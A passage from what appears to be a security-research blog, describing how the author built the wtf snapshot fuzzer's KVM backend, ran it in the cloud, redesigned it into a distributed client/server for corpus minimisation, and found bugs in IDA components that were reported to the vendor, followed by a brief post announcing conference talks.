  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == MAP_FAILED) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}
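With the KVM_CAP_SYNC_REGS capability, the kernel mirrors the GPRs into this shared mapping on every exit from KVM_RUN, so reading a register becomes a plain memory access. A sketch of what that might look like (field and flag names come from the Linux UAPI headers; the methods themselves are illustrative, not wtf's exact code):

//
// Sketch: ask KVM to keep the GPRs synchronized in the shared kvm_run
// mapping, then read them without any extra ioctl.
//

void KvmBackend_t::EnableSyncRegs() {
  Run_->kvm_valid_regs = KVM_SYNC_X86_REGS | KVM_SYNC_X86_SREGS;
}

uint64_t KvmBackend_t::Rip() const {

  //
  // The value was copied into the shared region on the last exit from
  // KVM_RUN.
  //

  return Run_->s.regs.regs.rip;
}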

On-demand paging

Implementing on-demand paging with KVM was very easy: it uses userfaultfd, so you can just start a thread that polls the fd and services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the poll fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll fails with EINTR when we are trying to kick the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}
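The thread above assumes that the guest RAM mapping was registered with a userfaultfd beforehand. The setup looks roughly like the following (a sketch of the standard userfaultfd(2) dance, not the exact wtf code):

//
// Sketch: create a userfaultfd, negotiate the API and register the mmap'd
// guest RAM so that missing-page faults are reported to the polling thread.
//

bool KvmBackend_t::SetupDemandPaging(void *Hva, const size_t Size) {
  Uffd_ = syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);
  if (Uffd_ < 0) {
    perror("userfaultfd");
    return false;
  }

  //
  // Handshake on the API version we expect.
  //

  struct uffdio_api UffdioApi = {.api = UFFD_API, .features = 0};
  if (ioctl(Uffd_, UFFDIO_API, &UffdioApi) < 0) {
    perror("UFFDIO_API");
    return false;
  }

  //
  // Register the guest RAM range for missing-page events.
  //

  struct uffdio_register UffdioRegister = {
      .range = {.start = uint64_t(Hva), .len = Size},
      .mode = UFFDIO_REGISTER_MODE_MISSING,
  };

  if (ioctl(Uffd_, UFFDIO_REGISTER, &UffdioRegister) < 0) {
    perror("UFFDIO_REGISTER");
    return false;
  }

  return true;
}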

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guest if the hardware supports it. When it does, I can program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI, which gets delivered through an interrupt vector programmed in the local APIC. To catch it, we simply break on hal!HalpPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work, you have to program the APIC a little bit, and I remember struggling to get the interruption to fire. I am still not 100% sure that I got the details fully right, but the interruption triggered consistently during my tests, so I called it a day. I would also like to revisit this area in the future, as there might be other features I could use for the fuzzer.
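For reference, the counter side of the programming is roughly the following. The MSR indices and bit layouts come from the Intel SDM, the 48-bit counter width is an assumption, SetMsr64 is a hypothetical helper wrapping KVM_SET_MSRS, and the APIC LVT programming that actually routes the PMI is left out:

//
// Sketch: arm the fixed instructions-retired counter so that it overflows
// (and raises a PMI) after `Limit` retired instructions.
//

constexpr uint32_t MSR_IA32_FIXED_CTR0 = 0x309;
constexpr uint32_t MSR_IA32_FIXED_CTR_CTRL = 0x38d;
constexpr uint32_t MSR_IA32_PERF_GLOBAL_CTRL = 0x38f;

void KvmBackend_t::ArmInstructionLimit(const uint64_t Limit) {

  //
  // Pre-load the 48-bit counter with its maximum value minus the budget.
  //

  SetMsr64(MSR_IA32_FIXED_CTR0, (1ULL << 48) - Limit);

  //
  // Count in ring 0 and ring 3 and request a PMI on overflow for fixed
  // counter 0 (bits 0, 1 and 3).
  //

  SetMsr64(MSR_IA32_FIXED_CTR_CTRL, 0b1011);

  //
  // Globally enable fixed counter 0 (bit 32).
  //

  SetMsr64(MSR_IA32_PERF_GLOBAL_CTRL, 1ULL << 32);
}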

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop, in a Hyper-V VM with nested virtualization turned on. It worked great, but the laptop was not very powerful, so I wanted to run the fuzzer on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had SKUs with nested virtualization available. I rented one of them to try it out, but the hardware didn't support the VMX feature called unrestricted_guest. I can't quite remember why it mattered, but it had to do with real mode, the APIC, and the way I create memory slots. I had developed the backend assuming this feature would be available, so I didn't use Azure either.

Instead, I rented a bare-metal server on vultr for about $100/month. The CPU was a Xeon E3-1270v6 (4 cores, 8 threads @ 3.8GHz), which seemed good enough for my usage. The hardware also had a PMU, which is where I developed wtf's support for it.

I was pretty happy because the fuzzer was running about 10x faster than with whv. It is not a fair comparison because the numbers weren't acquired on the same hardware, but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case generated executions of around 195 million instructions, with the following stats (as reported by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I had acquired a fairly large corpus made of the weirdest ELF files possible. This corpus contained 1.6 million ELF files, and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generated execution traces that eventually get merged together, but I didn't like that idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator; it distributes test cases to clients and receives code coverage reports from them. You can think of the clients as runners that just execute test cases and send the results back to the server. All the important state is kept on the server.
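Conceptually, the server side boils down to a loop like the following (purely illustrative pseudocode with made-up types, not wtf's actual protocol):

//
// Conceptual sketch: the server hands out mutated test cases, merges the
// coverage reported by clients and only keeps test cases that discovered
// new coverage.
//

void ServerLoop(Corpus_t &Corpus, Coverage_t &Coverage, Mutator_t &Mutator) {
  while (true) {
    Client_t Client = WaitForIdleClient();

    //
    // Pick a test case from the corpus, mutate it and ship it to the client.
    //

    const TestCase_t TestCase = Mutator.Mutate(Corpus.Pick());
    Client.Send(TestCase);

    //
    // The client runs it and reports back the coverage it observed.
    //

    const Report_t Report = Client.Receive();
    if (Coverage.Merge(Report.Coverage) > 0) {
      Corpus.Add(TestCase);
    }
  }
}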

This model was nice because it meant I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus with a single core would probably have taken weeks to complete, but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post we went through the birth of wtf, a distributed, code-coverage-guided, customizable, cross-platform, snapshot-based fuzzer designed for attacking user- and/or kernel-mode targets running on Microsoft Windows. Building it also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null dereferences, stack overflows, divisions by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following GitHub repository: fuzzing-ida75.

[image: bounty.png]

I probably fuzzed for an entire month, but most of the crashes popped up in the first two weeks. According to Lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files totaling 17MB.

[image: elf64.png]

Before signing out, I wanted to thank the IDA Hex-Rays team for handling and fixing my reports at an amazing speed. I would highly recommend you try out their bounty, as I am sure there's a lot left to be found.

Finally big up to my bros yrp604 & __x86 for proofreading this article.

My talks @ BlackHat 2021 and DefCon29

By: pi3
3 July 2021 at 20:59

This year I’m going to present some amazing research on:

Both of them are really unusual and interesting topics 😉

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam
